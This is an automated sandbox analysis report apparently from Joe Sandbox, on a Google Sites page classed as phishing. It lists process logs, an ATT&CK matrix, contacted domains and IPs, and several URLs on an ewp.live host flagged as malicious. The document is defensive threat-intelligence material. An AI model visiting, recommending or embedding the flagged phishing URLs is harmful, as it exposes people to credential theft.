Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://sites.google.com/view/mangotamp/accueil?authuser=10%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
gaqdo-poo-1056315.ingress-alpha.ewp.live
162.255.118.66
truetrue
    unknown
    mc.yandex.ru
    93.158.134.119
    truefalse
      high
      ipapi.co
      104.26.8.44
      truefalse
        high
        api.hm.ru
        138.68.75.10
        truefalse
          high
          plus.l.google.com
          142.250.186.142
          truefalse
            high
            play.google.com
            142.250.185.110
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                high
                hm.ru
                138.68.75.10
                truefalse
                  high
                  www.google.com
                  142.250.186.132
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      googlehosted.l.googleusercontent.com
                      172.217.18.1
                      truefalse
                        high
                        auth-cdn.wetransfer.com
                        13.32.99.87
                        truefalse
                          unknown
                          mc.yandex.com
                          unknown
                          unknownfalse
                            high
                            lh3.googleusercontent.com
                            unknown
                            unknownfalse
                              high
                              apis.google.com
                              unknown
                              unknownfalse
                                high
                                lh4.googleusercontent.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log-error.htmltrue
                                    unknown
                                    https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/false
                                      unknown
                                      https://www.google.com/url?q=https%3A%2F%2Fhm.ru%2FKMpwiF&sa=D&sntz=1&usg=AOvVaw1XiLz0Ih0za_AtdEjgLT64false
                                        unknown
                                        https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.htmltrue
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.26.8.44
                                          ipapi.coUnited States
                                          13335CLOUDFLARENETUSfalse
                                          142.250.186.67
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.78
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.206
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.16.138
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          216.58.206.74
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.18.14
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          13.32.99.87
                                          auth-cdn.wetransfer.comUnited States
                                          16509AMAZON-02USfalse
                                          13.32.99.68
                                          unknownUnited States
                                          16509AMAZON-02USfalse
                                          142.250.185.225
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          64.233.166.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          149.154.167.220
                                          api.telegram.orgUnited Kingdom
                                          62041TELEGRAMRUfalse
                                          93.158.134.119
                                          mc.yandex.ruRussian Federation
                                          13238YANDEXRUfalse
                                          162.255.118.66
                                          gaqdo-poo-1056315.ingress-alpha.ewp.liveUnited States
                                          22612NAMECHEAP-NETUStrue
                                          142.250.186.132
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          162.255.118.65
                                          unknownUnited States
                                          22612NAMECHEAP-NETUSfalse
                                          142.250.186.97
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.184.200
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.16.142
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.184.195
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.17.24.14
                                          cdnjs.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          172.217.16.206
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.186.163
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.18.3
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.234
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.110
                                          play.google.comUnited States
                                          15169GOOGLEUSfalse
                                          172.217.18.1
                                          googlehosted.l.googleusercontent.comUnited States
                                          15169GOOGLEUSfalse
                                          138.68.75.10
                                          api.hm.ruUnited States
                                          14061DIGITALOCEAN-ASNUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          142.250.185.195
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.186.142
                                          plus.l.google.comUnited States
                                          15169GOOGLEUSfalse
                                          77.88.21.119
                                          unknownRussian Federation
                                          13238YANDEXRUfalse
                                          142.250.184.232
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.74
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.16.195
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.97
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          216.239.34.178
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          IP
                                          192.168.2.16
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1608167
                                          Start date and time:2025-02-06 10:09:00 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://sites.google.com/view/mangotamp/accueil?authuser=1
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal60.phis.troj.win@20/68@50/376
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.250.186.67, 64.233.166.84, 142.250.186.142, 172.217.18.14, 216.58.212.142, 142.250.185.74, 142.250.186.163, 142.250.185.78, 172.217.16.195, 142.250.185.238, 172.217.18.3, 172.217.16.138, 142.250.184.202, 142.250.185.202, 142.250.184.234, 142.250.186.42, 142.250.185.234, 172.217.16.202, 142.250.186.138, 216.58.206.42, 142.250.185.170, 142.250.186.170, 142.250.186.106, 142.250.186.74, 216.58.212.170, 142.250.185.138, 142.250.181.234, 142.250.185.206
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: https://sites.google.com/view/mangotamp/accueil?authuser=1